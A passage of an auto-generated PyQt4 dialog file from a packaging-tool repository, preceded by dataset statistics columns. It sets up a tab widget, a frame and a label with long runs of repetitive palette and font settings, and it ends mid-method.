| 30.708333
| 92
| 0.606965
| 227
| 2,211
| 5.643172
| 0.211454
| 0.08587
| 0.084309
| 0.136612
| 0.842311
| 0.790008
| 0.78064
| 0.78064
| 0.750976
| 0.750976
| 0
| 0.063492
| 0.287653
| 2,211
| 71
| 93
| 31.140845
| 0.749841
| 0
| 0
| 0.55
| 0
| 0.033333
| 0.255088
| 0.062867
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.083333
| true
| 0
| 0.05
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ddd10b0657552f9624c52513b4c218a93c966a30
| 63,496
|
py
|
Python
|
ui/packagexx_test.py
|
game-platform-awaresome/XSdkTools
|
2d5454f998014c130a28695dfcd9da155d20c9e9
|
[
"MIT"
] | 2
|
2020-09-24T10:47:27.000Z
|
2020-09-24T10:49:57.000Z
|
ui/packagexx_test.py
|
game-platform-awaresome/XSdkTools
|
2d5454f998014c130a28695dfcd9da155d20c9e9
|
[
"MIT"
] | null | null | null |
ui/packagexx_test.py
|
game-platform-awaresome/XSdkTools
|
2d5454f998014c130a28695dfcd9da155d20c9e9
|
[
"MIT"
] | 4
|
2019-03-25T04:22:30.000Z
|
2021-05-16T12:52:41.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'packagexx_test.ui'
#
# Created: Tue Nov 17 14:12:58 2015
# by: PyQt4 UI code generator 4.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(857, 612)
self.tabWidget = QtGui.QTabWidget(Dialog)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 851, 611))
self.tabWidget.setBaseSize(QtCore.QSize(0, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.tabWidget.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setItalic(False)
font.setWeight(75)
font.setKerning(True)
self.tabWidget.setFont(font)
self.tabWidget.setIconSize(QtCore.QSize(16, 16))
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.index = QtGui.QWidget()
self.index.setObjectName(_fromUtf8("index"))
self.frame_3 = QtGui.QFrame(self.index)
self.frame_3.setGeometry(QtCore.QRect(60, 80, 201, 181))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 213, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 149, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 213, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 149, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 213, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 149, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.frame_3.setPalette(palette)
self.frame_3.setAutoFillBackground(True)
self.frame_3.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtGui.QFrame.Raised)
self.frame_3.setObjectName(_fromUtf8("frame_3"))
self.label_3 = QtGui.QLabel(self.frame_3)
self.label_3.setGeometry(QtCore.QRect(10, 150, 81, 16))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.label_3.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.tabWidget.addTab(self.index, _fromUtf8(""))
self.dabao = QtGui.QWidget()
self.dabao.setObjectName(_fromUtf8("dabao"))
self.groupBox = QtGui.QGroupBox(self.dabao)
